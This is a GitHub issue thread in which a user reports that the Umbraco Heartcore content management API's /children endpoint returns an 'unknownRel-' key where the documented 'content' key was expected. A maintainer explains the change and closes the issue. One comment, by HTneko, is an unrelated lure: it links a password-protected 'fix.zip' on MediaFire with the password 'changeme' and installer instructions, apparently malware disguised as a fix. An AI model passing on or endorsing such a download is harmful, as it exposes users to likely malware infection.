### ISSUE TITLE
Unknown response in Content management API

### ISSUE THREAD

**Issue by darren-homegroup** [umbraco/Umbraco.Heartcore.Issues#139]
### Summary

Querying children via the content management API now returns object with "unknownRel-" instead of "content" as per the API documentation.

Previously if the content had no children an empty array would be returned with a key of 'content'.

### Steps to reproduce

Query content with children via the content management API

### Expected result

```
{
    "_totalItems": 0,
    "_totalPages": 0,
    "_page": 1,
    "_pageSize": 10,
    "_links": {
        "self": {
            "href": "https://api.umbraco.io/content/ec3373df-0100-454b-a71a-913a403fe443/children?page=1&pageSize=10"
        },
        "page": {
            "href": "https://api.umbraco.io/content/ec3373df-0100-454b-a71a-913a403fe443/children?page={page}&pageSize={pageSize}",
            "title": "Page",
            "templated": true
        },
        "root": {
            "href": "https://api.umbraco.io/content",
            "title": "Content Root"
        }
    },
    "_embedded": {
        "content": []
    }
}
```

### Actual result

```
{
    "_totalItems": 0,
    "_totalPages": 0,
    "_page": 1,
    "_pageSize": 10,
    "_links": {
        "self": {
            "href": "https://api.umbraco.io/content/ec3373df-0100-454b-a71a-913a403fe443/children?page=1&pageSize=10"
        },
        "page": {
            "href": "https://api.umbraco.io/content/ec3373df-0100-454b-a71a-913a403fe443/children?page={page}&pageSize={pageSize}",
            "title": "Page",
            "templated": true
        },
        "root": {
            "href": "https://api.umbraco.io/content",
            "title": "Content Root"
        }
    },
    "_embedded": {
        "unknownRel-": []
    }
}
```

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jmf-umbraco** [comment]
Hi @darren-homegroup,

Thanks for the report. We'll take a look into this and see if we can reproduce your findings.

**Comment by jmf-umbraco** [comment]
Hi @darren-homegroup,

After testing on the previous version, we found that for a content item with no children, the actual result that was returned from the `/children` endpoint had no `_embedded` field at all. I.e. rather than:

```
{
    "_totalItems": 0,
    "_totalPages": 0,
    "_page": 1,
    "_pageSize": 10,
    "_links": { ... }
    },
    "_embedded": {
        "content": []
    }
}
```

What was previously being returned was:
```
{
    "_totalItems": 0,
    "_totalPages": 0,
    "_page": 1,
    "_pageSize": 10,
    "_links": { ... }
}
```

In the recent change, this was modified to include the `_embedded` property with a value of `{ "unknownRel-": [] }` property. We don't consider this a breaking change because we always reserve the right to add fields to the API. Consuming applications should be developed in a way that they can handle new properties being added.

Since we think this is desired behaviour, I'm going to close off this issue. Please let us know if you think otherwise.
